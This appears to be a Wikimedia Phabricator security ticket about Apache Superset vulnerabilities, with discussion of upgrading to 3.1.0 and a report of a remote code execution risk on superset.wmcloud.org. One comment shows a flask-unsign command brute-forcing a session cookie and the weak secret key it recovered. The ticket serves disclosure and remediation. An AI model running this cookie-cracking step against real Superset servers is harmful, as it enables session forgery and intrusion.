Description
Details
- Risk Rating
- Medium
- Author Affiliation
- WMF Technology Dept
Related Objects
- Mentioned In
- T355652: Upgrade to 3.1.0
Event Timeline
There is also a separate issue which is a configuration based Remote Code Execution vulnerability in the superset.wmcloud.org instance (not the superset.wikimedia.org instance), caused by the use of a guessable secret key in the Flask superset configuration as described in this article: https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
flask-unsign --unsign --cookie < superset-wmcloud-cookie [*] Session decodes to: {'_fresh': True, '_id': '9cb...[truncating]', ''), 'oauth_provider': 'mediawiki', 'oauth_state': '5JeER5yK7NYS9OUia1UFiCYo2uCtvc'} [*] No wordlist selected, falling back to default wordlist.. [*] Starting brute-forcer with 8 threads.. [*] Attempted (2176): -----BEGIN PRIVATE KEY-----ECR [+] Found secret key after 21248 attempts25zckjdhdgeA 'thisISaSECRET_1234'
Thanks for adding us.
For the superset.wikimedia.org instance, these CVEs are already being tracked by T335356
For the superset.wmcloud.org instance, I suspect that @rook will the person best placed to advise on our level of exposure and/or notify other people in the WMCS team to have a look at it.
I agree with the comment in T345928#9152910 that we should also change the secret key on the cloud instance as soon as possible.
So I'm going to remove Data-Platform-SRE for now as it's not our team, but subscribe to the ticket and I'll check back soon to make sure that it's being handled.
For the superset.wmcloud.org instance, I suspect that @rook will the person best placed to advise on our level of exposure and/or notify other people in the WMCS team to have a look at it.
I agree with the comment in T345928#9152910 that we should also change the secret key on the cloud instance as soon as possible.
Assuming I checked everything correctly, always worth questioning that one, the newest helm chart appears to still be on 2.1.0
superset/superset 0.10.6 2.1.0 Apache Superset is a modern, enterprise-ready b...
Should be easy to bump once they release a new helm chart.
Any reason not to make this task public? I'm not really seeing any unless the separate RCE/secret key issue above is still a concern.